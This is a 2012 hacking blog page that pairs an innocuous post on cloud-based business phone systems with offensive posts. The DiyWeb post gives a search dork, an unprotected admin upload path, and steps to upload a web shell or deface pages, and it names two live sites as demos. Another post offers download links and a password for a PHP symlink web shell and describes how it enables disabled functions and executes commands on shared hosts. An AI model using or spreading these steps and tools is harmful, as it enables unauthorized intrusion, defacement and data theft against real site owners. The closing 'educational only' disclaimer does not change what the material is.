ROLL

Wednesday, September 26, 2012

Cloudy with a chance of phone calls !

It’s not every day that you can report savings thanks to a cloud, but that’s exactly what’s possible if you look into various new phone systems technologies for your workplace.
One of the most popular methods of making savings on existing phone systems is by reducing revenue costs on multiple analogue exchange lines and replacing this requirement with a single data link into each office that requires telephony.

How to use just digital links

Within the UK, many businesses and public sector organizations such as schools and hospitals run on archaic equipment that is dependent on analogue copper lines into the building. One of the main reasons why so many organizations still use these analogue phone systems is due to their reliability; however, many analogue phone switches are now finally approaching their end of life, and a lot of organizations are being forced into looking for alternatives.
Phone systems providers such as Siemens Enterprise Communications, Meridian and Mitel have all produced PABXs, Hi-Paths and other analogue phone switches that used to rely on multiple analogue lines to handle high volumes of incoming calls into a single phone number.
With the introduction of multi-channel fibre ISDN lines, the associated high revenue costs can now be safely reduced by replacing 30 analogue lines with a single fiber line instead.

What system is best placed to use a digital link?

Whilst existing analogue phone switches can be upgraded to accept incoming multi-channel ISDN connections, with the support of these switches approaching their expiration (2017 for Siemens PABX switches) and the reliability of the systems also being called into question, an IP based phone system is clearly the way to go.

So how can you make use of the cloud?

Firstly, for those that don’t know, the cloud is a term used for something which is stored online. Cloud based technologies can be lent to anything related to IT – not just phone systems – and all have a common theme, data/services aren’t stored in your local office, but are accessed online, via an internet connection and therefore, a data link.
Once you’ve decommissioned those thousands of pounds worth of analogue phone lines, you’ll have plenty of spare revenue to invest in IPT Telephony systems capable of contacting cloud based services such as virtual operators, call recording, voice mail facilities, call usage stats etc.
Whilst the majority of IPT technologies rely on a locally based phone switch for many of the aforementioned functions, the cloud can save you money by effectively leasing these services over your data link.

Saturday, September 15, 2012

DiyWeb Admin Bypass and Remote file/shell Upload exploit

Hi Guys, hope you are well. so we are back on our Old topic after a long time ! enjoy new exploit and please share your views and share our Links on Facebook,twitter etc. Thanks !
so Now turn to work. our new exploit is DiyWeb admin bypass, in this vulnerability we can upload our shell, deface pages, and files by bypassing admin login panel.
Exploit title : DiyWeb Admin Bypass and & file Upload exploit
Discovered By : NoentryPhc
Sever : windows
Type : web application
Shell extention : .asp


admin+bypass+safe+monde+bypass+windows+server+asp+shell.jpg (400×300)
Dork : "Power by DiyWeb" 
            inurl:/template.asp?menuid=
Pocdiyweb/menu/admin/image_manager.asp
This exploit's almost all vulnerable websites are Malaysiyan.
To upload your files Goto : http://www.website.com/diyweb/menu/admin/image_manager.asp
and upload your shell/deface there !
if .php extention is not allowed then your can try tamper data and live http headers
to acess your file goto : http://www.website.com/Images/yourfilehere and sometimes you have to find your manually on websites
Live Demo : 
http://otgmalaysia.com/diyweb/menu/admin/image_manager.asp
http://www.famosapadu.com.my/diyweb/menu/admin/image_manager.asp

find more using Google dork :) Thanks for reading. please share post on facebook and other social networks


JBOSS Exploitation:
http://resources.infosecinstitute.com/jboss-exploitation/
EC-Council Certification:
http://www.infosecinstitute.com/certifications/ec-council.html#ceh

Free Download "MANNU php Symlink shell" with Graphical User Interface

MANNU Shell is GUI based symlink php shell  .
download  shell from this link
 http://www.mediafire.com/?dfn61sm88n1ve1q
Download v 2.0 (password Protected)
http://www.mediafire.com/?6t7np02j7g30hc4

  • username team
  • password indishell

mannu+(2).jpg (720×450)

This script basically contains following functions
1.generates php.ini file :-
 it is to create php.ini file which help us to enable the disabled functions so that we can execute commands

2.Symlink the ROOT directory :-
  This option symlink the "/" directory (root directory) and gives the hyperlink to that directory where symlink has done
3.cms based symlink:-
  This option provides us the direct link of cms like joomla,wordpress
or you can get public_html diectory hyperlink just by providing website username(once we have done with second option)
4.website and username :-
 This function list the website hosted on server with their usernames.
5.username function :-
  in case /etc/named.conf has no read permission to list the server website
  just provide website name and press enter to get the username of the website

6.command execution :-
   you can run commands from this input box

first of all click on "generate php.ini" hyperlink (to enable all the functions on server) and the shell will show
hyperlink which we need to open in new tab and this process will enable the disabled function
and second step is to click on "symlink the root folder" hyperlink to check is server is vulnerable to symlink
when we will click on this option , shell will show hyperlink to "root" directory symlink
open it in new new tab,if we dont get 404 error, means symlink has been done
now you can use third and sixth option.

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.
Related Posts Plugin for WordPress, Blogger...

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More